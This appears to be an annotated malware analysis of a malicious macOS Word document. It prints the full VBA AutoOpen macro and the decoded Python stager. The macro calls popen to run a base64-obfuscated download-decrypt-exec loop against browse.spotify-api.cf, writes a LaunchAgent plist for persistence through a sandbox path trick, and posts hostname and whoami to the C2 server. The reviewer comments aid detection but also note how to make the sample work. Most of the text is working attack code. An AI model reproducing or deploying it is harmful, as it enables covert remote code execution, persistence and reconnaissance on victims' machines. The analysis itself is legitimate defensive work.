VBA MacOffice threat
## Uploaded by @JohnLaTwC
## SHA-256: e92833f056a197851a5476240a4f3ca94aa8f180e057bb022842dbdd3dbdaf1a
olevba3 0.53.1 - http://decalage.info/python/oletools
Flags Filename
----------- -----------------------------------------------------------------
OpX:MASI-B-- e92833f056a197851a5476240a4f3ca94aa8f180e057bb022842dbdd3dbdaf1a
===============================================================================
Type: OpenXML
-------------------------------------------------------------------------------
VBA MACRO ThisDocument.cls
in file: word/vbaProject.bin - OLE stream: 'VBA/ThisDocument'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
(empty macro)
-------------------------------------------------------------------------------
VBA MACRO NewMacros.bas
in file: word/vbaProject.bin - OLE stream: 'VBA/NewMacros'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
' Imports libc popen(3) under the misleading local name "system".
' Every system(...) call in AutoOpen therefore hands its first argument to
' /bin/sh -c; the returned LongPtr is the FILE* and is never read or closed.
' PtrSafe/LongPtr mean this was built for 64-bit Office for Mac.
Private Declare PtrSafe Function system Lib "libc.dylib" Alias "popen" (ByVal command As String, ByVal mode As String) As LongPtr
' AutoOpen fires when the document is opened with macros enabled. It does three
' things, all through popen -> /bin/sh (see the Declare above):
'   1. builds a python -c one-liner that base64-decodes and exec()s a
'      download-and-exec stager (decoded under "decodes to" below),
'   2. writes a LaunchAgent plist so that stager is re-run by launchd,
'   3. POSTs the output of `hostname;whoami` to browse.spotify-api.cf as a check-in.
' The macro itself never writes the second stage to disk; only the plist is dropped.
Sub AutoOpen()
Dim path As String
Dim arg As String
Dim cmd As String
Dim result As LongPtr
' Stager command line for python -c. The base64 payload is a Python 2 urllib2 +
' RC4 fetch-decrypt-exec loop; warnings are silenced so nothing shows on stderr.
' Presumably split into many concatenations to defeat naive string matching.
cmd = "import sys,base64,warnings;warnings.filterwarnings('ignore');exec(base64.b64decode('aW1wb3J0IHN5cztpbXBvcnQgdXJsbGliMjsKVUE9J01vemlsbGEvNS"
cmd = cmd + "4wIChNYWNpbnRvc2g7IEludGVsIE1hYyBPUyBYIDEwXzEzXz"
cmd = cmd + "YpIEFwcGxlV2ViS2l0LzUzNy4zNiAoS0hUTUwsIGxpa2UgR2"
cmd = cmd + "Vja28pIENocm9tZS82OS4wLjM0OTcuODEgU2FmYXJpLzUzNy"
cmd = cmd + "4zNic7c2VydmVyPSdodHRwOi8vYnJvd3NlLnNwb3RpZnktYX"
cmd = cmd + "BpLmNmOjgwJzt0PScvdXBkYXRlJztyZXE9dXJsbGliMi5SZX"
cmd = cmd + "F1ZXN0KHNlcnZlcit0KTsKcmVxLmFkZF9oZWFkZXIoJ1VzZX"
cmd = cmd + "ItQWdlbnQnLFVBKTsKcmVxLmFkZF9oZWFkZXIoJ0Nvb2tpZS"
cmd = cmd + "csInNlc3Npb249ZDlKakxQWWxKbEROeGdLR3pHV0ZFOW5tT1"
cmd = cmd + "hjPSIpOwpwcm94eSA9IHVybGxpYjIuUHJveHlIYW5kbGVyKC"
cmd = cmd + "k7Cm8gPSB1cmxsaWIyLmJ1aWxkX29wZW5lcihwcm94eSk7Cn"
cmd = cmd + "VybGxpYjIuaW5zdGFsbF9vcGVuZXIobyk7CmE9dXJsbGliMi"
cmd = cmd + "51cmxvcGVuKHJlcSkucmVhZCgpOwpJVj1hWzA6NF07ZGF0YT"
cmd = cmd + "1hWzQ6XTtrZXk9SVYrJzM1ZGYyYzM4MmQ2MGMyZjYxZDIyMW"
cmd = cmd + "ZlNzUwZjFmYjFkJztTLGosb3V0PXJhbmdlKDI1NiksMCxbXQ"
cmd = cmd + "pmb3IgaSBpbiByYW5nZSgyNTYpOgogICAgaj0oaitTW2ldK2"
cmd = cmd + "9yZChrZXlbaSVsZW4oa2V5KV0pKSUyNTYKICAgIFNbaV0sU1"
cmd = cmd + "tqXT1TW2pdLFNbaV0KaT1qPTAKZm9yIGNoYXIgaW4gZGF0YT"
cmd = cmd + "oKICAgIGk9KGkrMSklMjU2CiAgICBqPShqK1NbaV0pJTI1Ng"
cmd = cmd + "ogICAgU1tpXSxTW2pdPVNbal0sU1tpXQogICAgb3V0LmFwcG"
cmd = cmd + "VuZChjaHIob3JkKGNoYXIpXlNbKFNbaV0rU1tqXSklMjU2XS"
cmd = cmd + "kpCmV4ZWMoJycuam9pbihvdXQpKQ=='));"
' Persistence path: four levels up from $HOME, then Library/LaunchAgents.
' NOTE(review): inside the Word sandbox, HOME is expected to be the container
' directory (~/Library/Containers/com.microsoft.Word/Data); walking up four levels
' from there lands on the real home directory, i.e. ~/Library/LaunchAgents.
' The "~$" prefix is the naming pattern Office uses for its own owner/lock files,
' which the sandbox profile permits it to write; presumably chosen for that reason.
' Both points should be confirmed on a live install before relying on them.
path = Environ("HOME") & "/../../../../Library/LaunchAgents/~$com.spotify-browser-api.plist"
' LaunchAgent body. Three caveats for anyone reproducing this:
'  (a) VBA does not interpret "\n"; the literal backslash-n reaches the shell's
'      echo, and macOS /bin/sh's builtin echo expands it (verify on the target OS).
'  (b) The doubled "" inside this VBA literal become single " characters, and the
'      echo command below wraps the whole thing in double quotes, so the shell
'      treats those inner quotes as quote toggles rather than literal text. The
'      plist as written therefore probably lacks the quotes around 1.0, UTF-8 and
'      the DOCTYPE identifiers; check whether launchd still loads it before
'      rating this persistence as functional.
'  (c) RunAtLoad + StartInterval 100 = run at login and every 100 seconds; the
'      KeepAlive/NetworkState key asks launchd to keep it alive while the network
'      is up (historically documented as unimplemented - confirm). No launchctl
'      load is issued, so the agent only takes effect at the next login.
arg = "<?xml version=""1.0"" encoding=""UTF-8""?>\n" & _
"<!DOCTYPE plist PUBLIC ""-//Apple//DTD PLIST 1.0//EN"" ""http://www.apple.com/DTDs/PropertyList-1.0.dtd"">\n" & _
"<plist version=""1.0"">\n" & _
"<dict>\n" & _
"<key>Label</key>\n" & _
"<string>com.spotify.browser-api</string>\n" & _
"<key>ProgramArguments</key>\n" & _
"<array>\n" & _
"<string>python</string>\n" & _
"<string>-c</string>\n" & _
"<string>" & cmd & "</string>" & _
"</array>\n" & _
"<key>RunAtLoad</key>" & _
"<true/>" & _
"<key>StartInterval</key>\n" & _
"<integer>100</integer>\n" & _
"<key>KeepAlive</key>\n" & _
"<dict>\n" & _
"<key>NetworkState</key>\n" & _
"<true/>\n" & _
"</dict>\n" & _
"</dict>\n" & _
"</plist>"
' Drop the plist via shell redirection: echo "<arg>" > '<path>' (see caveat (b)).
' The program name is a bare "python", so it depends on PATH at launchd time.
result = system("echo """ & arg & """ > '" & path & "'", "r")
' Initial check-in. Spoofed Chrome 69 / macOS 10.13.6 user agent; -s silent,
' -L follow redirects, -k skip TLS certificate verification. The POST body is
' the output of `hostname;whoami` via backtick command substitution, so the C2
' learns the machine name and the user the document was opened as.
result = system("curl -A'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.81 Safari/537.36' -sLk https://browse.spotify-api.cf/connect -d""`hostname;whoami`""", "r")
End Sub
## The base64 blob inside `cmd` (handed to exec() by the python -c stager) decodes to:
# Second-stage stager, decoded from the macro's base64 payload. Indentation of
# the two loops restored from the base64 (4 spaces; the page listing lost it).
# Python 2 only: urllib2, and S = range(256) must be a list for the in-place swaps.
# Flow: GET http://browse.spotify-api.cf:80/update with a browser User-Agent and a
# fixed "session" cookie -> first 4 bytes of the reply are an IV, the remainder is
# RC4 ciphertext keyed with IV + the hard-coded staging key -> decrypt -> exec in
# memory. Nothing is written to disk by this stage.
# NOTE(review): fixed cookie + 4-byte IV + RC4(IV||staging key) + exec is the
# layout of the EmPyre/Empire Python stager - confirm attribution against a
# known sample rather than from this shape alone.
import sys;import urllib2;
UA='Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.81 Safari/537.36';server='http://browse.spotify-api.cf:80';t='/update';req=urllib2.Request(server+t);
req.add_header('User-Agent',UA);  # same spoofed UA as the macro's curl beacon
req.add_header('Cookie',"session=d9JjLPYlJlDNxgKGzGWFE9nmOXc=");  # static campaign/session identifier; useful as a network IOC
proxy = urllib2.ProxyHandler();  # no explicit proxies, so urllib2 picks up *_proxy environment variables
o = urllib2.build_opener(proxy);
urllib2.install_opener(o);
a=urllib2.urlopen(req).read();  # plain HTTP on port 80: this request and the ciphertext are visible on the wire
IV=a[0:4];data=a[4:];key=IV+'35df2c382d60c2f61d221fe750f1fb1d';S,j,out=range(256),0,[]  # '35df...' is the hard-coded staging key
# RC4 key-scheduling algorithm
for i in range(256):
    j=(j+S[i]+ord(key[i%len(key)]))%256
    S[i],S[j]=S[j],S[i]
i=j=0
# RC4 keystream generation, XORed byte-wise against the payload
for char in data:
    i=(i+1)%256
    j=(j+S[i])%256
    S[i],S[j]=S[j],S[i]
    out.append(chr(ord(char)^S[(S[i]+S[j])%256]))
exec(''.join(out))  # decrypted stage runs directly in this interpreter